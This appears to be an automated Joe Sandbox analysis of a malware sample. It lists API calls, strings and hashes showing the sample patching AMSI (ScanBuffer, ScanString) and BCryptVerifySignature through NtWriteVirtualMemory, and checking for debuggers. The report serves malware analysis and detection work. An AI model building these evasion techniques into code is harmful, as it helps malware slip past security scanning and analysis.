                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 8599 2dc87a0-2dc87c5 LoadLibraryW 8600 2dc880f-2dc8815 8599->8600 8601 2dc87c7-2dc87df GetProcAddress 8599->8601 8602 2dc8804-2dc880a FreeLibrary 8601->8602 8603 2dc87e1-2dc8800 call 2dc7d00 8601->8603 8602->8600 8603->8602 8606 2dc8802 8603->8606 8606->8602
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryW.KERNEL32(?,?), ref: 02DC87B4
                                                                                                                                      • GetProcAddress.KERNEL32(02E11390,BCryptVerifySignature), ref: 02DC87CE
                                                                                                                                      • FreeLibrary.KERNEL32(02E11390,02E11390,BCryptVerifySignature,bcrypt,?,02E113D0,00000000,02E113A4,02DCA3C7,ScanString,02E113A4,02DCA77C,ScanBuffer,02E113A4,02DCA77C,Initialize), ref: 02DC880A
                                                                                                                                        • Part of subcall function 02DC7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC7D74
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                      • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                      • API String ID: 1002360270-4067648912
                                                                                                                                      • Opcode ID: fbee287345105851f4fd6b04cacf306306dd51a6bb9401f5035a5eb8596ad5d1
                                                                                                                                      • Instruction ID: 5669723578ff26bc80b0616b4439fd5ad431daafc5c968b178b2421c742df332
                                                                                                                                      • Opcode Fuzzy Hash: fbee287345105851f4fd6b04cacf306306dd51a6bb9401f5035a5eb8596ad5d1
                                                                                                                                      • Instruction Fuzzy Hash: BAF0A471EC025C9EEB119E6AA844FB6739CDB44354F52093DB30E8FA48C7704C90CB60
                                                                                                                                      Function 02DC870C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryW.KERNEL32(amsi), ref: 02DC8715
                                                                                                                                        • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC811B
                                                                                                                                        • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(?,?), ref: 02DC812D
                                                                                                                                        • Part of subcall function 02DC7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC7D74
                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02DC8774
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressLibraryProc$FreeLoadMemoryVirtualWrite
                                                                                                                                      • String ID: DllGetClassObject$W$amsi
                                                                                                                                      • API String ID: 2980007069-2671292670
                                                                                                                                      • Opcode ID: 7620dc9f238aae5b3fbfebb65a3e59fa0fe7b92f4717741d7b58d382de8f491c
                                                                                                                                      • Instruction ID: d236b8d27e9645079aaa4e86fed0dac23fd57e8ba37026efced9eb29caaf7971
                                                                                                                                      • Opcode Fuzzy Hash: 7620dc9f238aae5b3fbfebb65a3e59fa0fe7b92f4717741d7b58d382de8f491c
                                                                                                                                      • Instruction Fuzzy Hash: 1DF0815050C382B9E202A6748C45F4BAACD8B52224F148B5CF1A8973D2D675D5049BB7
                                                                                                                                      Function 02DCEBF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 8616 2dcebf0-2dcec0a GetModuleHandleW 8617 2dcec0c-2dcec1e GetProcAddress 8616->8617 8618 2dcec36-2dcec3e 8616->8618 8617->8618 8619 2dcec20-2dcec30 CheckRemoteDebuggerPresent 8617->8619 8619->8618 8620 2dcec32 8619->8620 8620->8618
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(KernelBase), ref: 02DCEC00
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02DCEC12
                                                                                                                                      • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02DCEC29
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                                      • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                      • API String ID: 35162468-539270669
                                                                                                                                      • Opcode ID: 8abcaacf3c5cf33c8753ed07399825ac3971706a46700a2c8a894639f7e61eff
                                                                                                                                      • Instruction ID: b6c3d5fb154a47ddb46f84cf4e6dcd2080422498e3e5279304ef965a3bbe3d4d
                                                                                                                                      • Opcode Fuzzy Hash: 8abcaacf3c5cf33c8753ed07399825ac3971706a46700a2c8a894639f7e61eff
                                                                                                                                      • Instruction Fuzzy Hash: 08F0A7B090428DAAD722A7B8C9897DCFBA99B05338F7403D8D425632C1E7750E44C6A1
                                                                                                                                      Function 02DB1A8F Relevance: 7.7, APIs: 6, Instructions: 173sleepCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 8621 2db1a8f-2db1a9b 8622 2db1b6c-2db1b6f 8621->8622 8623 2db1aa1-2db1aa5 8621->8623 8624 2db1c5c-2db1c60 8622->8624 8625 2db1b75-2db1b7f 8622->8625 8626 2db1b08-2db1b11 8623->8626 8627 2db1aa7-2db1aae 8623->8627 8632 2db16e8-2db170b call 2db1644 VirtualFree 8624->8632 8633 2db1c66-2db1c6b 8624->8633 8628 2db1b3c-2db1b49 8625->8628 8629 2db1b81-2db1b8d 8625->8629 8626->8627 8634 2db1b13-2db1b27 Sleep 8626->8634 8630 2db1adc-2db1ade 8627->8630 8631 2db1ab0-2db1abb 8627->8631 8628->8629 8635 2db1b4b-2db1b5f Sleep 8628->8635 8636 2db1b8f-2db1b92 8629->8636 8637 2db1bc4-2db1bd2 8629->8637 8640 2db1af3 8630->8640 8641 2db1ae0-2db1af1 8630->8641 8638 2db1abd-2db1ac2 8631->8638 8639 2db1ac4-2db1ad9 8631->8639 8649 2db170d-2db1714 8632->8649 8650 2db1716 8632->8650 8634->8627 8643 2db1b2d-2db1b38 Sleep 8634->8643 8635->8629 8644 2db1b61-2db1b68 Sleep 8635->8644 8645 2db1b96-2db1b9a 8636->8645 8637->8645 8647 2db1bd4-2db1bd9 call 2db14c0 8637->8647 8646 2db1af6-2db1b03 8640->8646 8641->8640 8641->8646 8643->8626 8644->8628 8651 2db1bdc-2db1be9 8645->8651 8652 2db1b9c-2db1ba2 8645->8652 8646->8625 8647->8645 8655 2db1719-2db1723 8649->8655 8650->8655 8651->8652 8654 2db1beb-2db1bf2 call 2db14c0 8651->8654 8656 2db1bf4-2db1bfe 8652->8656 8657 2db1ba4-2db1bc2 call 2db1500 8652->8657 8654->8652 8660 2db1c2c-2db1c59 call 2db1560 8656->8660 8661 2db1c00-2db1c28 VirtualFree 8656->8661
                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 02DB1B17
                                                                                                                                      • Sleep.KERNEL32(0000000A,00000000), ref: 02DB1B31
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                      • Opcode ID: 054b4bb23c5f36c673fbaa28c62c2e7de51d71d3cb7f42a7672513bf650fad42
                                                                                                                                      • Instruction ID: 7a8c1a16f65d6dab4942cbc0d6797e7d5416a2f0f11c58b3a29814df84489317
                                                                                                                                      • Opcode Fuzzy Hash: 054b4bb23c5f36c673fbaa28c62c2e7de51d71d3cb7f42a7672513bf650fad42
                                                                                                                                      • Instruction Fuzzy Hash: 6251BF71A44240CFEB16CB69C9B4796BBD0EF46314F1885AED44A8B386D760DC86CBA1
                                                                                                                                      Function 02DB4168 Relevance: 3.1, APIs: 2, Instructions: 125COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 596ac98dc3f8c4c84974893d5c47ac619c7167a9f776b6940c53c6b7f307908e
                                                                                                                                      • Instruction ID: ec40d437c9425ac900d41ea0ecbc17db4849dc6407886d8c6be4a46bbd97f02f
                                                                                                                                      • Opcode Fuzzy Hash: 596ac98dc3f8c4c84974893d5c47ac619c7167a9f776b6940c53c6b7f307908e
                                                                                                                                      • Instruction Fuzzy Hash: 98414875C81204DBDB16DF29E4B47AA3BA5EF45314FA88869E80687346C7709CE1CF61
                                                                                                                                      Function 02DC8824 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02DC8020: GetModuleHandleA.KERNELBASE(?), ref: 02DC8072
                                                                                                                                        • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC811B
                                                                                                                                        • Part of subcall function 02DC80C8: GetProcAddress.KERNEL32(?,?), ref: 02DC812D
                                                                                                                                        • Part of subcall function 02DC7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC7D74
                                                                                                                                      • FreeLibrary.KERNEL32(02E11384,00000000,02E11388,Function_000055D8,00000004,02E11398,02E11388,05F5E0FF,00000040,02E1139C,02E11384,00000000,00000000,00000000,00000000,02DC890B), ref: 02DC88EB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$FreeHandleLibraryMemoryModuleVirtualWrite
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3430646871-0
                                                                                                                                      • Opcode ID: 8c5b07dafb7070891b8d95f99f6cbf0ce916d53228e142077d16e7fb7287d61d
                                                                                                                                      • Instruction ID: 7d2d3462b4a4d88f16e1ad8ae99de26ab9defa03f0d744ad9db21fa7f9f9b96e
                                                                                                                                      • Opcode Fuzzy Hash: 8c5b07dafb7070891b8d95f99f6cbf0ce916d53228e142077d16e7fb7287d61d
                                                                                                                                      • Instruction Fuzzy Hash: 0811B770680304EBEF02FBA5D822E9E77ADDF45710F914578720AE7B45CA349D505F60
                                                                                                                                      Function 02DB5814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleFileNameA.KERNEL32(026E1B20,?,00000105), ref: 02DB5832
                                                                                                                                        • Part of subcall function 02DB5A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02DB5A94
                                                                                                                                        • Part of subcall function 02DB5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DB5AB2
                                                                                                                                        • Part of subcall function 02DB5A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DB5AD0
                                                                                                                                        • Part of subcall function 02DB5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02DB5AEE
                                                                                                                                        • Part of subcall function 02DB5A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02DB5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02DB5B37
                                                                                                                                        • Part of subcall function 02DB5A78: RegQueryValueExA.ADVAPI32(?,02DB5CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02DB5B7D,?,80000001), ref: 02DB5B55
                                                                                                                                        • Part of subcall function 02DB5A78: RegCloseKey.ADVAPI32(?,02DB5B84,00000000,00000000,00000005,00000000,02DB5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DB5B77
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2796650324-0
                                                                                                                                      • Opcode ID: 8d2262c70beaae2bbfdede8a2f275eb551cfb6ca49d82510be69373b1f735333
                                                                                                                                      • Instruction ID: 0a98ba91a22c03908e992f650fcba0e3d9090d442b0e243d7572f9dbb07da741
                                                                                                                                      • Opcode Fuzzy Hash: 8d2262c70beaae2bbfdede8a2f275eb551cfb6ca49d82510be69373b1f735333
                                                                                                                                      • Instruction Fuzzy Hash: E8E06571A00214CBCB11DE6C98D0A8637D8AF08B94F8009A5EC5ADF34AD3B0ED208BE0
                                                                                                                                      Function 02DB7E3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000,?,02DD2A49,ScanString,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8,ScanBuffer,02E0CE80,02DDAFD8,OpenSession,02E0CE80,02DDAFD8,Initialize), ref: 02DB7E47
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AttributesFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                      • Opcode ID: 918f298baab567261b01832f852b415502b6f9a037000ea6829b55bd1045afca
                                                                                                                                      • Instruction ID: 7dd45264eaf03e908a8405adfaea8bb6da53d7500910518f32cb71eebff473ed
                                                                                                                                      • Opcode Fuzzy Hash: 918f298baab567261b01832f852b415502b6f9a037000ea6829b55bd1045afca
                                                                                                                                      • Instruction Fuzzy Hash: 18C08CA66022068F6F62A2FC1CE02DA42CA8E88534BA01B31E03AD63C2D311DC222420
                                                                                                                                      Function 02DDBB50 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • timeSetEvent.WINMM(?,00000000), ref: 02DDBB60
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Eventtime
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2982266575-0
                                                                                                                                      • Opcode ID: a3644a37415c9ce226de77cd21f88448b47dcb5f59ad4de5147687fd09ce9313
                                                                                                                                      • Instruction ID: 6b8a69062ffb6dfb0a3aa20ff8c5288353764f7eff23367c48eee31af79f27d7
                                                                                                                                      • Opcode Fuzzy Hash: a3644a37415c9ce226de77cd21f88448b47dcb5f59ad4de5147687fd09ce9313
                                                                                                                                      • Instruction Fuzzy Hash: C7C092F0B913007EF62056A81CD2F63A1CDF704B09F610412BA01EE3D6D5E24C600A38
                                                                                                                                      Function 02DB4BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02DB4BEB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocString
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2525500382-0
                                                                                                                                      • Opcode ID: db6a3f861f0a6b35b86245416a4c288905a5a0e602f748b147a7570e0d217214
                                                                                                                                      • Instruction ID: 736b5de74196028e15403c0caa30d2693662dc39a8be7f03bd93c173f1d749ba
                                                                                                                                      • Opcode Fuzzy Hash: db6a3f861f0a6b35b86245416a4c288905a5a0e602f748b147a7570e0d217214
                                                                                                                                      • Instruction Fuzzy Hash: 65B09228648202D8EA1691620D31BF2008C4F5068AF8400A19F6BC8381EB00CC00C83A
                                                                                                                                      Function 02DB4BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 02DB4C03
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeString
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3341692771-0
                                                                                                                                      • Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                                                                      • Instruction ID: ac5c435cc18653b664f204761055910ce4940443d5b6787e1c93f0c25b3211f9
                                                                                                                                      • Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                                                                      • Instruction Fuzzy Hash: 6BA011A88002028A8E0B222800300AA2032AEE0A02B8AC0A800020A2008A2A8800A838
                                                                                                                                      Function 02DB1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02DB16A4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                      • Opcode ID: 1e287d79e3f341764a96a7a1c5ead6ed56b39d1b8237514d6fbd5c8916ae9d81
                                                                                                                                      • Instruction ID: 0b136c7677bf846cffec902dff147e69f61bf464813999b24a3215bce490b28b
                                                                                                                                      • Opcode Fuzzy Hash: 1e287d79e3f341764a96a7a1c5ead6ed56b39d1b8237514d6fbd5c8916ae9d81
                                                                                                                                      • Instruction Fuzzy Hash: 5DF090B2A80795ABD712AF5ADC90782BB94FF00314F454139F94897340D770EC90CBD4
                                                                                                                                      Function 02DB16E6 Relevance: 1.3, APIs: 1, Instructions: 26COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02DB1704
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                      • Opcode ID: a7e77cd9f554437f4d0eb2781b761697678b3a9a335b5248c624b8d6e7d5ac83
                                                                                                                                      • Instruction ID: 8d650c853030fb67b06184682e4669ecc40753832e2855baeaa2068a7098ec79
                                                                                                                                      • Opcode Fuzzy Hash: a7e77cd9f554437f4d0eb2781b761697678b3a9a335b5248c624b8d6e7d5ac83
                                                                                                                                      • Instruction Fuzzy Hash: 5FE0DF71300300EFE7105A3D4C607926AC8EF44620F244575F54ACB3C1C2A0DC108B20